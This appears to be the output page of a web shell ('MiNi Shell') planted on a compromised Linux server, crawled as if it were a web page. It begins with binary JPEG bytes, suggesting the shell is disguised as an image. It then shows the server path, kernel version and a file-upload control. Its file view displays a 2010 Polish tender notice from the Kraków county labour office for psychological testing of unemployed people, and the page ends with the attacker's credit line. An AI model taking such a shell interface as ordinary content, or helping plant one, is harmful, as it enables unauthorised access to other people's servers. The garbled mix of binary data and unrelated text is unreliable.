JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100218/34007-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro
na usługi polegające na określaniu predyspozycji do wykonywania zawodu u osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego, zgodnie z art. 40 ust. 5 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r.  Nr 69 poz. 415 z późn. zm); 
znak sprawy: ZP- 271/10/2010</b><br>
<b>Numer ogłoszenia: 34007 - 2010; data zamieszczenia: 18.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro
na usługi polegające na określaniu predyspozycji do wykonywania zawodu u osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego, zgodnie z art. 40 ust. 5 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r.  Nr 69 poz. 415 z późn. zm); 
znak sprawy: ZP- 271/10/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi polegające na określaniu u osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego predyspozycji do wykonywania zawodu wymagającego szczególnych predyspozycji psychofizycznych, zgodnie z art. 40 ust. 5 ustawy o promocji zatrudnienia i instytucjach rynku pracy.
2.	Zamawiający zleci wykonawcy przeprowadzenie badań psychologicznych celem określenia predyspozycji do wykonywania zawodu w ilości co najmniej 250. 
3.	Określenie predyspozycji  oznacza przeprowadzanie badań mających na celu ocenę osobowości zawodowej i ewentualnie zaburzeń z zakresu organiki jak również zachowania i emocji. Narzędziem wykorzystanym podczas realizacji badań będą testy psychologiczne. 
4.	Określanie predyspozycji przeprowadzane będzie u osób, które zamawiający planuje skierować na szkolenie uprawniające do wykonywania zawodu  wymagającego szczególnych predyspozycji psychofizycznych, związanego, między innymi, z obsługą suwnic sterowanych z kabiny i zdalnie sterowanych, podnośników i platform hydraulicznych, układnic magazynowych, żurawi wieżowych i samojezdnych, urządzeń mechanicznych, urządzeń walcowniczych, w zakresie operatorów samojezdnych maszyn budowlanych i drogowych, operatorów sterowniczych urządzeń technologicznych wielofunkcyjnych i wielozadaniowych, w zakresie prac drużyn trakcyjnych oraz maszynistów, w zakresie prac kierowców, w zakresie prac przy liniach napowietrznych niskich, średnich i wysokich napięć, w zakresie pracownika ochrony osób i mienia, w zakresie zawodów wymagających dobrej koordynacji wzrokowo - ruchowej. 
5.	Celem określenia predyspozycji do wykonywania zawodu będzie określenie u osoby skierowanej przez zamawiającego predyspozycji psychofizycznych, tj. psychologicznych i fizycznych, których posiadanie umożliwi jej wykonywanie wskazanej  przez zamawiającego pracy .
6.	Zamawiający kierował będzie osobę bezrobotną do wykonawcy poprzez wystawienie imiennego skierowania - załącznik nr 1 A do SIWZ, podpisanego przez upoważnionego pracownika Urzędu Pracy Powiatu Krakowskiego oraz opatrzonego pieczęcią firmową Urzędu Pracy Powiatu Krakowskiego lub jego Filii  w Skawinie, Słomnikach lub Krzeszowicach, którego okres ważności wynosić będzie 14 dni. Z uwagi na fakt, że Urząd Pracy Powiatu Krakowskiego pracuje w układzie filijnym, każda z Filii odrębnie kierować będzie osoby bezrobotne na badanie. 
7.	Pierwszym etapem działań wykonawcy będzie przeprowadzenie badania  psychologicznego, które potwierdzi lub wykluczy posiadanie przez osobę skierowaną   predyspozycji psychologicznych do  wykonywania pracy po odbytym szkoleniu.
8.	Badanie psychologiczne prowadzone będzie przez osobę z wykształceniem psychologicznym, która ponadto posiada kwalifikacje doradcy zawodowego lub specjalność psychologa pracy. Zamawiający oczekuje, że wykonawca, na potrzeby realizacji zamówienia, winien dysponować co najmniej trzema osobami o kwalifikacjach j.w.
9.	W wyniku badania psychologicznego wykonawca winien dokonać podsumowania otrzymanych przez osobę badaną wyników oraz przygotować pisemną opinię zarówno dla badanego jak również dla Zamawiającego.
10.	W sytuacji, gdy badania psychologiczne potwierdzą zdolność do podjęcia szkolenia w zawodzie wymagającym określonych predyspozycji do wykonywania zawodu, wykonawca zobowiązany będzie do skierowania badanego do lekarza medycyny pracy w celu uzyskania przez w/w zdolności do odbycia szkolenia z uwzględnieniem indywidualnych predyspozycji właściwych dla zawodu, który uzyska po szkoleniu. 
11.	Celem badania przez lekarza medycyny pracy oraz zleconych przez niego badań diagnostycznych i specjalistycznych konsultacji lekarskich, będzie stwierdzenie, czy - pod względem zdrowotnym - osoba bezrobotna spełnia warunki do  wykonywania pracy, po odbyciu w szkoleniu. 
12.	W wyniku badania przez lekarza medycyny pracy, osobie bezrobotnej wystawione zostanie zaświadczenie o zdolności lub też braku zdolności do wykonywania pracy oraz uczestnictwa w szkoleniu zawodowym. Zaświadczenie wystawiane będzie w dwóch egzemplarzach: jeden dla badanego, drugi dla zamawiającego 
13.	Zamawiający oczekuje, że wykonawca będzie dysponował co najmniej jedną osobą z uprawnieniami lekarza medycyny pracy, zgodnie 10 ustawą z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317 z późn. zm.), która jednocześnie, na podstawie art. 14 przywołanej powyżej ustawy, będzie zlecać wykonywanie niektórych świadczeń, w szczególności badań diagnostycznych i specjalistycznych konsultacji lekarskich innym uprawnionym podmiotom;
14.	W sytuacji, gdy wykonawca będzie realizował badanie zlecone przez lekarza medycyny pracy lecz, które nie zostało uwzględnione w formularzu ofertowym, wówczas ponoszone przez wykonawcę koszty realizacji tego badania zostaną zamawiającemu refakturowane, tj. koszty jego realizacji przeniesione zostaną na zamawiającego po cenie zakupu zapłaconej przez wykonawcę, bez doliczania jakiejkolwiek marży lub innego wynagrodzenia. Wykonawca koszty refakturowane będzie wyszczególniał na wystawianych przez siebie fakturach VAT/rachunkach, o których mowa w punkcie 16, jako odrębną pozycję.
15.	Lokalizacja, w której Wykonawca będzie realizował badania ma znajdować się w mieście Krakowie. Do oferty należy dołączyć informację o usytuowaniu obiektu, w którym realizowane będą badania psychologiczne jak również konsultacje lekarza medycyny pracy i lekarzy specjalistów a także informację, gdzie wykonawca będzie realizował pozostałe badania diagnostyczne.
16.	Wykonawca, na dzień 15-go dnia każdego miesiąca, wystawi zamawiającemu cztery faktury VAT/rachunki; trzy dotyczyć będą badań osób bezrobotnych kierowanych z Filii w Skawinie, Słomnikach i Krzeszowicach a jedna Oddziału Kraków. Do każdej faktury załączony zostanie imienny wykaz osób przebadanych przez Wykonawcę z  wyszczególnionymi datami oraz  kodami badań pochodzącymi z Klasyfikacji procedur medycznych ICD.
17.	Zamawiający oczekuje, że termin płatności zobowiązań wyniesie 21 dni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zamówień uzupełniających będzie polegał na powtórzeniu przedmiotu zamówienia podstawowego, w zakresie do 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-3, 85.12.10.00-3, 85.14.50.00-7, 85.14.80.00-8, 85.15.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  dysponowania osobami zdolnymi do wykonania zamówienia, a w szczególności wykonawcy: 
a)	dysponują lub będą dysponować co najmniej trzema osobami uczestniczącymi w wykonywaniu zamówienia, z których każda spełnia łącznie przesłanki określone w punkcie A i B, tj.: 
A.	posiada dyplom ukończenia studiów wyższych na kierunku psychologia a także
B.	posiada kwalifikacje doradcy zawodowego i/lub specjalność psychologa pracy;
b)	dysponują lub  będą dysponować co najmniej jedną osobą wykonującą zawód lekarza medycyny pracy zgodnie z ustawą z dnia 27 czerwca 1997 r. o służbie medycyny pracy - tekst jednolity Dz. U. z 2004 r. Nr 125 poz. 1317 z późn. zm.) i która jednocześnie może zlecić - na podstawie umowy - wykonywanie niektórych świadczeń, w szczególności badań diagnostycznych i specjalistycznych konsultacji lekarskich - art. 14 powyżej przywołanej ustawy;
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych w  punkcie VI SIWZ, tj.: (1)	Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 4 do SIWZ;
(2) Oświadczenie, że osoby uczestniczące w wykonywaniu zamówienia, posiadają wymagane uprawnienia - załącznik nr 5 do SIWZ; 
(3) Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 3, wykonawca wskazał osoby, którymi będzie dysponował.
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
Jeżeli wykonawca, wykazując spełnianie warunku określonego w punkcie IV. 3 SIWZ, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia, poprzez złożenie razem z ofertą oświadczenia o braku podstaw do wykluczenia - załącznik nr 7 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności,  których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com